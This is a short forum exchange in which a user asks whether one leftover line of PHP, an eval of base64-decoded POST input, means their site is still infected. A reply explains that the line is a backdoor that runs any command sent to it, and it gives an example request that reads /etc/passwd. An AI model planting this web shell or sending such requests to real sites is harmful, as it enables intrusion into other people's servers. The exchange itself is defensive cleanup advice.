Quote:
Originally Posted by boneless
i read it and got a small question:
it says if you got the include line and the base64 line then youre still infected.
i only got this one:
@eval(base64_decode($_POST[qxp]));//';
does that mean im not infected, or still infected?
|
FYI that little bit of code executes whatever is passed in variable 'qxp'
So they could post something like qxp=cat%20/etc/passwd (display the contents of the password file)